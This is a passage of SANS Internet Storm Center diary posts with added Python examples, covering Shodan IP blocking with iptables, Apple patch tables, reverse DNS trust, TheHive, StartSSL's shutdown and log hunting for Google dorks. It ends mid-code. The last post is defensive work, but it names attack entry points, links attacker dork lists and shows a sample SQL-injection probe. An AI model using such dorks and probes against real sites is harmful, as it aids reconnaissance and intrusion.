iptables -F shodan
# Temporary RETURN rule so that traffic keeps flowing while the chain is rebuilt
iptables -A shodan -j RETURN
# Only accept dotted-quad addresses before handing them to iptables
ipv4_re='^[0-9]{1,3}(\.[0-9]{1,3}){3}$'
for ip in $(curl -A "myemailaddress" -s https://isc.sans.edu/api/threatlist/shodan?json | jq -r '.[].ipv4')
do
  echo "$ip"
  if [[ $ip =~ $ipv4_re ]]
  then
    iptables -A shodan -s "$ip" -j LOGDROP
  else
    echo "Bad IP Address. Aborting."
    exit 1
  fi
done
# Remove the temporary RETURN rule (rule 1) now that the block list is in place
iptables -D shodan 1

LOGDROP is a chain that will log the packet and drop it. You could also just drop it here, but this would be a bit dangerous, as you wouldn't see these dropped packets in your logs, which makes debugging problems extra fun.

For a full list of our API functions, see https://isc.sans.edu/api . Please use your e-mail address as the user agent. We do not require authentication, but if your script causes issues, then it would be nice if we could check with you rather than just blocking you.

Of course, test carefully and use at your own risk.
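An added example (not the ISC's or the diary's code) that does the validation step more strictly: each feed entry is checked with Python's ipaddress module, and instead of appending rules one by one behind a temporary RETURN, the accepted addresses are rendered as an iptables-restore fragment that replaces the chain in a single commit (a swapped-in technique, not the diary's). The JSON is a constructed sample in the shape of the API's list of {"ipv4": ...} objects.

```python
import ipaddress
import json
import urllib.request

API_URL = "https://isc.sans.edu/api/threatlist/shodan?json"

# Constructed sample in the shape of the API's JSON; TEST-NET addresses
# stand in for real scanner IPs, plus three entries that must be rejected.
SAMPLE_JSON = """[
  {"ipv4": "198.51.100.7"},
  {"ipv4": "203.0.113.250"},
  {"ipv4": "999.1.1.1"},
  {"ipv4": "127.0.0.1"},
  {"ipv4": null}
]"""


def fetch_feed(user_agent):
    """Download the live list; the ISC asks for your e-mail as User-Agent."""
    req = urllib.request.Request(API_URL, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8")


def extract_addresses(payload):
    """Split the feed into (accepted, rejected).

    Accepted entries are syntactically valid IPv4 addresses that are not
    loopback, link-local, multicast or unspecified, so a malformed or
    hostile feed entry cannot make the firewall drop local traffic. A
    digits-and-dots check like the diary's shell regex would pass
    "999.1.1.1" straight to iptables.
    """
    accepted, rejected = [], []
    for entry in json.loads(payload):
        raw = entry.get("ipv4") if isinstance(entry, dict) else None
        try:
            addr = ipaddress.IPv4Address(raw)
        except ValueError:  # AddressValueError, also raised for None or ""
            rejected.append(raw)
            continue
        if addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified:
            rejected.append(raw)
            continue
        accepted.append(str(addr))
    return accepted, rejected


def render_restore(addresses, chain="shodan", target="LOGDROP"):
    """Build an iptables-restore fragment that rebuilds CHAIN in one commit.

    The ':chain - [0:0]' line (re)declares the user-defined chain; with
    'iptables-restore --noflush' only that chain is flushed and refilled,
    the rest of the filter table is left alone. TARGET (LOGDROP) and the
    jump from INPUT into CHAIN must already exist, as in the diary.
    """
    lines = ["*filter", f":{chain} - [0:0]"]
    lines += [f"-A {chain} -s {a}/32 -j {target}" for a in addresses]
    lines.append("COMMIT")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Swap SAMPLE_JSON for fetch_feed("you@example.com") to use the live list.
    accepted, rejected = extract_addresses(SAMPLE_JSON)
    for raw in rejected:
        print(f"# rejected feed entry: {raw!r}")
    print(render_restore(accepted), end="")
```

Pipe the output into `iptables-restore --noflush`; the rejected entries are printed as comments so they show up in the cron mail instead of silently disappearing.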


---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|


6 Comments

Published: 2017-12-06

Apple Updates Everything. Again.

After a rushed release of iOS 11.2 over the weekend to fix a "December 2nd Crash" bug, and last week's special update to fix the passwordless root authentication bypass in macOS, Apple today released its official set of security updates. With this, we also received details about the security issues patched in iOS this weekend. Apple's different operating systems share a lot of code with each other, and as a result, they also share some vulnerabilities. I am trying to organize the details in a table below (starting with macOS; others will be added soon).

Apple's security updates can be found here: https://support.apple.com/en-us/HT201222

Overview

Component              CVE                   macOS/OS X  iOS  tvOS  watchOS
Mail Drafts            %%cve:2017-13860%%    X           X    -     -
IOKit                  %%cve:2017-13847%%    X           X    -     -
Kernel                 %%cve:2017-13862%%    X           X    X     X
Kernel                 %%cve:2017-13876%%    X           X    X     X
Kernel                 %%cve:2017-13867%%    X           X    X     X
Kernel                 %%cve:2017-13869%%    X           X    X     X
OpenSSL                %%cve:2017-3735%%     X           -    -     -
Kernel                 %%cve:2017-13868%%    X           X    X     X
Mail                   %%cve:2017-13874%%    -           X    -     -
Kernel                 %%cve:2017-13833%%    X           X    X     X
Wi-Fi                  %%cve:2017-13080%%    -           X    X     X
Kernel                 %%cve:2017-13865%%    X           X    X     X
IOKit                  %%cve:2017-13858%%    X           -    -     -
IOAcceleratorFamily    %%cve:2017-13844%%    X           -    -     -
Intel Graphics Driver  %%cve:2017-13883%%    X           -    -     -
Kernel                 %%cve:2017-13855%%    X           X    X     X
curl                   %%cve:2017-1000254%%  X           -    -     -
Intel Graphics Driver  %%cve:2017-13878%%    X           -    -     -
Directory Utility      %%cve:2017-13872%%    X           -    -     -
Intel Graphics Driver  %%cve:2017-13875%%    X           -    -     -
IOKit                  %%cve:2017-13848%%    X           -    -     -
Mail                   %%cve:2017-13871%%    X           -    -     -
IOMobileFrameBuffer    %%cve:2017-13879%%    -           X    -     -
apache                 %%cve:2017-9798%%     X           -    -     -
IOSurface              %%cve:2017-13861%%    -           X    X     X
Screen Sharing Server  %%cve:2017-13826%%    X           -    -     -

MacOS / OS X

Component High Sierra Sierra El Capitan Impact Description CVE
Apache x x x Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory Multiple issues were addressed by updating to version 2.4.28. %%cve:2017-9798%%
cURL x x x Malicious FTP servers may be able to cause the client to read out-of-bounds memory An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking. %%cve:2017-1000254%%
Directory Utility x     An attacker may be able to bypass administrator authentication without supplying the administrator’s password A logic error existed in the validation of credentials. This was addressed with improved credential validation. (This is the "password-less root" patch released last week.) %%cve:2017-13872%%
Intel Graphics Driver x     An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13883%%
Intel Graphics Driver x     A local user may be able to cause unexpected system termination or read kernel memory An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. %%cve:2017-13878%%
Intel Graphics Driver x     An application may be able to execute arbitrary code with system privileges An out-of-bounds read was addressed through improved bounds checking. %%cve:2017-13875%%
IOAcceleratorFamily x x x An application may be able to execute arbitrary code with system privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13844%%
IOKit x     An application may be able to execute arbitrary code with system privileges An input validation issue existed in the kernel. This issue was addressed through improved input validation. %%cve:2017-13848%%,%%cve:2017-13858%%
IOKit x x x An application may be able to execute arbitrary code with system privileges Multiple memory corruption issues were addressed through improved state management. %%cve:2017-13847%%
Kernel x x x An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%
Kernel x x x An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel x     An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13876%%
Kernel x x x An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel x x x A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel x     An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13865%%
Kernel x x x An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13868%%,%%cve:2017-13869%%
Mail x     A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed An inconsistent user interface issue was addressed with improved state management. %%cve:2017-13871%%
Mail Drafts x     An attacker with a privileged network position may be able to intercept mail An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control. %%cve:2017-13860%%
OpenSSL x x x An application may be able to read restricted memory An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking. %%cve:2017-3735%%

iOS

Component Affected Models Impact Description CVE
IOKit iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with system privileges Multiple memory corruption issues were addressed through improved state management. %%cve:2017-13847%%
IOMobileFrameBuffer iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privilege A memory corruption issue was addressed with improved memory handling. %%cve:2017-13879%%
IOSurface iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory Multiple validation issues were addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Mail iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Incorrect certificate is used for encryption A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate. %%cve:2017-13874%%
Mail Drafts iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An attacker with a privileged network position may be able to intercept mail An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control. %%cve:2017-13860%%
Wi-Fi iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation (released for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in iOS 11.1) An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%

Apple TV

Component Affected Models Impact Description CVE
IOSurface Apple TV 4K and Apple TV (4th generation) An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel Apple TV 4K and Apple TV (4th generation) A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory Multiple validation issues were addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Wi-Fi Apple TV (4th generation) An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%

Watch OS

Component Affected Models Impact Description CVE
IOSurface All  An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel All  An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel All  An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel All  An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel All    A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel All  An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Wi-Fi 1st Gen and Series 3 An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%


---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|


0 Comments

Published: 2017-12-06

PSA: Do not Trust Reverse DNS (and why does an address resolve to "localhost").

Odd reverse DNS entries keep coming up from time to time. So I think we are due for a quick public service announcement about reverse DNS.

Reverse DNS can be valuable for finding out more about an IP address. For example:

$ dig +short -x 73.53.237.51
c-73-53-237-51.hsd1.fl.comcast.net.

This tells me that the IP belongs to Comcast and is probably located in Florida. 

$ dig +short -x 189.154.91.153
dsl-189-154-91-153-dyn.prod-infinitum.com.mx.

The "dyn" part usually indicates that this is a dynamic IP address. For example, mail servers will often mark e-mail received from such addresses as spam; spam filtering in particular often relies on reverse DNS. In order to configure reverse DNS, you typically need to be assigned an IP address block from your ISP, and the ISP needs to make your DNS server authoritative for the block by adding the respective NS (name server) records. This cannot be done for dynamic IPs and typically requires at least a /24 assignment (some ISPs allow updating reverse DNS records via web applications so that small business users with /29s or individual IPs can maintain them).

So what is the problem? Let's take a look at this IP that our reader John noted in his e-mail server logs:

$ dig +short -x 123.28.192.74
localhost.

That's right. This IP resolves to "localhost". This isn't exactly a new trick. Sometimes I think this is just done out of laziness. But the effect is that e-mail from this IP may slip past some spam filters, and it is a bit more difficult to find the actual owner of the IP. A quick sample suggests that all IPs in 123.28/16 resolve to localhost.

The problem with reverse DNS is that the owner of the IP address is in charge of reverse DNS, not the owner of the domain the IP resolves to. Anybody who has control over reverse DNS for an IP address block can make the address reverse resolve to "isc.sans.edu" (or localhost).

Some access control mechanisms use hostnames instead of IP addresses, and as a result, rely on reverse DNS for access control. This is BAD!

To trust reverse DNS, you need to at least make sure that forward and reverse DNS match. This way, both the owner of the domain and the owner of the IP address have to enter matching configurations. For example, if you add from="*.example.com" to your ssh authorized_keys file, sshd will make sure forward and reverse resolution match. Same if you try to figure out if a particular IP address But even in this case, you are still using DNS, a not very robust protocol, for security decisions. This is fine as an additional constraint, for example in addition to an ssh key, or for spam filtering, where you do not have to be perfect.

If you are using reverse DNS as part of your incident response process, then you also need to be aware that whoever operates the authoritative name server for that IP will likely learn of your requests. The attacker may be affiliated with the operator. This is mostly a concern for more sophisticated attackers, but overall it may be a good idea to at least use a more "anonymous" recursive name server like Google, OpenDNS or Quad9.

RFC1912 actually states that every IP should have a name (and with that, a PTR record). But note it says should, not must. I believe it is a good idea to configure reverse DNS. But keep in mind that it should not leak information. I like the scheme most ISPs use, which is essentially something like [ipaddress].example.com. This way, a reverse lookup will still point to the right owner of the IP, but it will not leak any information beyond that. A "whois" lookup would give you the same information, but whois tends to be slower, more difficult to update, and more difficult to parse than DNS. Unless your system is a mail server, in which case you want to make sure that forward and reverse DNS match to avoid spam filter problems.

And don't forget to make sure that you sanitize and properly encode reverse DNS results before using them. They should never be treated as "trusted".
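The forward-confirmed check described above, as an added example that is not from the diary: it syntax-checks the PTR name before using it, rejects names the IP owner cannot legitimately claim (such as "localhost"), and only reports "confirmed" when the name resolves back to the IP. The lookups are passed in as callables, so the check runs offline against constructed answer tables here (the forward answers for the diary's three addresses are assumed, not observed) and against the system resolver in production.

```python
import re
import socket

# RFC 1123 host name label: letters, digits and hyphens, 1-63 characters,
# no leading or trailing hyphen. A full name is at most 253 characters.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def valid_hostname(name):
    """Syntax check a PTR result before anything else looks at it."""
    name = name.rstrip(".")
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split("."))


def check_reverse_dns(ip, ptr_lookup, forward_lookup):
    """Classify the reverse DNS of IP.

    ptr_lookup(ip) returns the PTR name or None; forward_lookup(name)
    returns the set of IPv4 addresses the name resolves to. Returns
    (verdict, name) where verdict is one of:
      no-ptr          no PTR record at all
      invalid-name    PTR data is not a syntactically valid host name
      untrusted-name  a name the IP owner cannot legitimately claim
                      (localhost, or a bare label with no domain)
      mismatch        the name does not resolve back to the IP
      confirmed       forward and reverse agree (FCrDNS)
    Only "confirmed" means the IP owner and the domain owner both had to
    cooperate; even then the name is data to be encoded, not trusted.
    """
    name = ptr_lookup(ip)
    if name is None:
        return "no-ptr", None
    name = name.rstrip(".").lower()
    if not valid_hostname(name):
        return "invalid-name", name
    labels = name.split(".")
    if "localhost" in labels or len(labels) < 2:
        return "untrusted-name", name
    if ip not in forward_lookup(name):
        return "mismatch", name
    return "confirmed", name


def system_ptr(ip):
    """PTR lookup through the system resolver (None if there is no PTR)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def system_forward(name):
    """A records of NAME through the system resolver (empty set on failure)."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return set()
    return {info[4][0] for info in infos}


# Constructed answer tables. The first three IPs are the diary's examples;
# the forward answers are assumed for the sake of the example.
PTR_TABLE = {
    "73.53.237.51": "c-73-53-237-51.hsd1.fl.comcast.net.",
    "189.154.91.153": "dsl-189-154-91-153-dyn.prod-infinitum.com.mx.",
    "123.28.192.74": "localhost.",
    "198.51.100.9": "mail.example.net.",
    "198.51.100.10": "bad name.example.net.",
}
A_TABLE = {
    "c-73-53-237-51.hsd1.fl.comcast.net": {"73.53.237.51"},
    "mail.example.net": {"203.0.113.5"},
}


def sample_resolvers():
    """(ptr_lookup, forward_lookup) backed by the constructed tables."""
    return PTR_TABLE.get, lambda name: A_TABLE.get(name, set())


if __name__ == "__main__":
    ptr, fwd = sample_resolvers()  # use system_ptr, system_forward for live checks
    for ip in list(PTR_TABLE) + ["203.0.113.77"]:
        verdict, name = check_reverse_dns(ip, ptr, fwd)
        print(f"{ip:16} {verdict:15} {name}")
```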


---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|


0 Comments

Published: 2017-12-05

IR using the Hive Project.

Request Tracker for Incident Response (RTIR) is one of the most popular IR ticketing systems. It's an open source project based on Perl and MySQL. While it meets all your typical ticket tracking needs, it needs lots of customization to meet your SOC needs. A few months ago I came across a project called TheHive (https://thehive-project.org/), which is a scalable open source platform.


The frontend is written in AngularJS and the backend is Elasticsearch. The platform has the ability to create tickets, organize workflow, track indicators, import data about indicators from other sources and export it into MISP. The team developing it is doing an amazing job of fixing bugs and adding new features to the system on a monthly basis.


TheHive has several other components that should be leveraged to give you the full power of the overall system. These components are Cortex and Hippocampe.


They have several ways to get started: a set of Docker images, a test VM, or you can download the source and install it. I'd start with the VM or Docker just to get a feel for it.


Basic GUI workflow:

To create a new case using a template, select new case and the template you want.


The initial details page is filled with whatever you set up for the template, new tags and any additional information can be added.

Tasks are where you put your case notes. You can have them broken out by the 6 stages of IR, by tools, or by playbook processes. Within the tasks you can have the IR processes documented to go along with the task itself.



 

Select the task you are working and then add a new task log to document your findings.

 

 

TheHive definitely meets the requirement for for logging,tracking, tracking. You can also add metrics that are required before the case is closed. What make this system great is the ability to add your IOC’s into the case, additionally if will tell you any other case that also has this IOC’s for better tracking.


 

Once you add in your IOC, you can ran analyzers in Cortex against the data and it will automatically be added to the case. They have 30 analyzers currently you can setup and use.
 

 

I have just scratched the surface of the tool, they do a great job of documentation and you should check out their blog https://blog.thehive-project.org for lots more information.
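Two of the points above (tasks broken out by the six IR stages, and the cross-case IOC pivot) scripted rather than clicked. This is an added example, not code from TheHive or from this diary: the case-body field names (title, description, severity, tlp, tags, tasks), the POST /api/case endpoint and the bearer-token header are my assumptions about TheHive's REST API, to be checked against the version you run, and the existing-case store is a constructed in-memory list standing in for what TheHive keeps in Elasticsearch.

```python
import json
import urllib.request

# The six incident-response stages the diary mentions for breaking tasks out (PICERL).
IR_STAGES = ["Preparation", "Identification", "Containment",
             "Eradication", "Recovery", "Lessons Learned"]


def build_case_payload(title, description, tags=(), severity=2, tlp=2):
    """Case body with one task per IR stage (field names are an assumption, see lead-in)."""
    return {
        "title": title,
        "description": description,
        "severity": severity,
        "tlp": tlp,
        "tags": list(tags),
        "tasks": [{"title": stage, "status": "Waiting"} for stage in IR_STAGES],
    }


def build_create_request(base_url, api_key, payload):
    """urllib Request for POST /api/case (endpoint and bearer auth are assumptions)."""
    return urllib.request.Request(
        f"{base_url.rstrip('/')}/api/case",
        data=json.dumps(payload).encode(),
        method="POST",
        headers={"Authorization": f"Bearer {api_key}",
                 "Content-Type": "application/json"},
    )


# Constructed stand-in for observables already attached to other cases (demo data only).
EXISTING_CASES = [
    {"id": "case-101", "title": "Phishing wave A",
     "observables": [("domain", "login-update.example"), ("ip", "203.0.113.9")]},
    {"id": "case-102", "title": "Malware on HR laptop",
     "observables": [("hash", "d41d8cd98f00b204e9800998ecf8427e"), ("ip", "203.0.113.9")]},
    {"id": "case-103", "title": "Scanner from partner",
     "observables": [("ip", "198.51.100.44")]},
]


def related_cases(cases, new_observables):
    """Map each new observable value to the ids of existing cases that already contain it.

    This is the pivot TheHive shows when an IOC is added to a case, computed
    locally here over the constructed list.
    """
    index = {}
    for case in cases:
        for kind, value in case["observables"]:
            index.setdefault((kind, value.lower()), []).append(case["id"])
    return {value: index.get((kind, value.lower()), [])
            for kind, value in new_observables}


if __name__ == "__main__":
    payload = build_case_payload("Suspicious login", "Triage of alert #42", tags=["phishing"])
    req = build_create_request("https://thehive.example", "API_KEY_PLACEHOLDER", payload)
    print(req.full_url, req.get_header("Authorization"))
    # urllib.request.urlopen(req) would submit it; not called here so the demo stays offline.
    print(related_cases(EXISTING_CASES, [("ip", "203.0.113.9"), ("domain", "fresh.example")]))
```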

 

--

Tom Webb

@twsecblog

1 Comments

Published: 2017-12-03

StartSSL: Termination of Services is Now Scheduled

StartCom[1] has been a key player for years in the landscape of SSL certificate providers with its 'StartSSL' services. They provided free SSL certificates for everybody and permitted a lot of small organizations to increase the security of their web communications. The fact that StartCom is a China-based company was, for some organizations, a good reason to flag their activities as suspicious. They also suffered from security incidents[2]. In October 2016, Mozilla decided[3] to remove the StartCom certificates from Firefox. Google did the same with Chrome in March 2017[4].

The termination of services is now officially scheduled (for the 1st of January 2018). Here is the official message sent to customers:

Dear customer,

As you are surely aware, the browser makers distrusted StartCom around a
year ago and therefore all the end entity certificates newly issued by
StartCom are not trusted by default in browsers.

The browsers imposed some conditions in order for the certificates to be
re-accepted. While StartCom believes that these conditions have been met, it
appears there are still certain difficulties forthcoming. Considering this
situation, the owners of StartCom have decided to terminate the company as a
Certification Authority as mentioned in Startcom's website.

StartCom will stop issuing new certificates starting from January 1st, 2018
and will provide only CRL and OCSP services for two more years.

StartCom would like to thank you for your support during this difficult
time.

StartCom is contacting some other CAs to provide you with the certificates
needed. In case you don't want us to provide you an alternative, please,
contact us at certmaster@startcomca.com

Please let us know if you need any further assistance with the transition
process. We deeply apologize for any inconveniences that this may cause.

Best regards,

StartCom Certification Authority

I searched across my SSL activity logs and I found 5 websites still using a StartSSL certificate. If you're still using StartSSL certificates for some websites, it's time to move to an alternative provider. We highly recommend having a look at the Let's Encrypt project[5].
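One way to run the same search over your own SSL activity logs, added here as an example (not part of the diary): a small reader for Bro/Zeek's ssl.log that takes the column names from the #fields header and reports every server whose certificate issuer mentions StartCom. The log excerpt is constructed, uses only a subset of the real ssl.log columns, and follows Zeek's header and "-" (unset) conventions.

```python
# Constructed issuer string in the style of a StartCom-issued certificate (demo data).
STARTCOM_ISSUER = ("CN=StartCom Class 1 DV Server CA,"
                   "OU=StartCom Certification Authority,O=StartCom Ltd.,C=IL")

# Constructed Zeek/Bro ssl.log excerpt: real header layout, subset of columns.
SSL_LOG = "\n".join([
    "#separator \\x09",
    "#set_separator\t,",
    "#empty_field\t(empty)",
    "#unset_field\t-",
    "#path\tssl",
    "#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tserver_name\tsubject\tissuer",
    "#types\ttime\taddr\taddr\tport\tstring\tstring\tstring",
    "1512259200.123456\t10.1.1.5\t203.0.113.10\t443\twww.example.test\tCN=www.example.test\t" + STARTCOM_ISSUER,
    "1512259201.000000\t10.1.1.6\t198.51.100.20\t443\tapi.example.test\tCN=api.example.test\t"
    "CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US",
    "1512259202.000000\t10.1.1.7\t203.0.113.10\t443\twww.example.test\tCN=www.example.test\t" + STARTCOM_ISSUER,
    "1512259203.500000\t10.1.1.8\t203.0.113.99\t443\t-\t-\t-",  # e.g. resumed session, no cert seen
    "#close\t2017-12-03-00-00-00",
])


def parse_zeek_log(text):
    """Yield one dict per record, naming columns from the #fields header.

    Zeek writes '-' for unset fields; those come back as None.
    """
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("record seen before #fields header")
        yield {k: (None if v == "-" else v) for k, v in zip(fields, line.split("\t"))}


def startcom_servers(text, needle="startcom"):
    """Unique (server_name, responder IP, issuer) triples whose issuer mentions the needle."""
    found = set()
    for rec in parse_zeek_log(text):
        issuer = rec.get("issuer") or ""
        if needle in issuer.lower():
            name = rec.get("server_name") or rec["id.resp_h"]
            found.add((name, rec["id.resp_h"], issuer))
    return sorted(found)


if __name__ == "__main__":
    for name, ip, issuer in startcom_servers(SSL_LOG):
        print(f"{name} ({ip}) still served by: {issuer}")
```

Point the same function at a real ssl.log and you get the inventory of sites to migrate before the CRL/OCSP-only period starts; matching on the issuer rather than the server name is what catches certificates on hosts nobody remembers.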

[1] https://www.startcomca.com/
[2] https://isc.sans.edu/forums/diary/StartSSL+a+web+authentication+authority+suspend+services+after+a+security+breach/11071
[3] https://blog.mozilla.org/security/2016/10/24/distrusting-new-wosign-and-startcom-certificates/
[4] https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
[5] https://letsencrypt.org/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

1 Comments

Published: 2017-12-02

Using Bad Material for the Good

There is a huge amount of information shared online by attackers. Once again, pastebin.com is a nice place to start hunting. As this material is available for free, why not use it for good? Attackers (with or without bots) are constantly looking for entry points on websites. Those entry points are a good place to search, for example, for SQL injections. Example:

add_to_cart.php?item=

As attackers are also hunting for new targets, they have automated tools or bots that scan the Internet for potential new victims. To do this, they use search engines and search for specific strings called "dorks". The term comes from the Google Hacking Database project[1]. This is an old project, but attackers are still creating lists of interesting URIs and it's quite easy to find them. Here are two examples of pasties with big lists of dorks:

https://pastebin.com/ABZ8Z8zy
https://pastebin.com/Tdvi8vgK

Why not reuse this free "bad" material to perform hunting in your own website's logs and have a head start on attackers? The benefits are multiple: you will probably detect suspicious pages that should not be publicly available and you'll be able to detect if people are already scanning your infrastructure.

With Splunk, create a CSV file containing all the interesting dorks and use a query like the following one to search for them across all your Apache logs:

sourcetype=access_combined [|inputlookup dorks.csv | eval uri="*".dork."*" | fields uri]

Don't forget that the more dorks you search for in your logs, the more hits you will find. Try to reduce the noise by removing trusted IP addresses, etc.
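The same hunt without Splunk, as an added example that is not part of the diary: load the dorks from the CSV, match each one as a case-insensitive substring of the request URI (the equivalent of the `"*".dork."*"` wildcard above) against Apache combined-format lines, and drop hits from trusted networks to cut the noise. The dorks.csv content and the log lines are constructed; the handling of a leading `inurl:` operator (stripped, since we match on the URI directly) is my assumption about what appears in pasted dork lists.

```python
import csv
import io
import ipaddress
import re

# Constructed dorks.csv with the single column the Splunk query reads (dork).
DORKS_CSV = """dork
add_to_cart.php?item=
inurl:phpmyadmin/
admin/login.php
"""

# Constructed Apache combined-log lines (documentation IP ranges only).
ACCESS_LOG = """\
198.51.100.7 - - [02/Dec/2017:10:15:01 +0000] "GET /shop/add_to_cart.php?item=1%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2017:10:15:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Dec/2017:10:16:00 +0000] "GET /admin/login.php HTTP/1.1" 302 0 "-" "curl/7.55.1"
203.0.113.4 - - [02/Dec/2017:10:16:30 +0000] "GET /PhpMyAdmin/index.php HTTP/1.1" 404 209 "-" "python-requests/2.18"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

# Networks whose scans you already know about (assumption: your own scanners live in 10/8).
TRUSTED = [ipaddress.ip_network("10.0.0.0/8")]


def load_dorks(csv_text):
    """Read the dork column; strip a leading 'inurl:' (GHDB operator) since we match on the URI."""
    dorks = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        d = row["dork"].strip()
        if d.lower().startswith("inurl:"):
            d = d[len("inurl:"):]
        if d:
            dorks.append(d)
    return dorks


def is_trusted(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED)


def hunt(log_text, dorks):
    """Case-insensitive substring match of each dork against the request URI, trusted IPs dropped.

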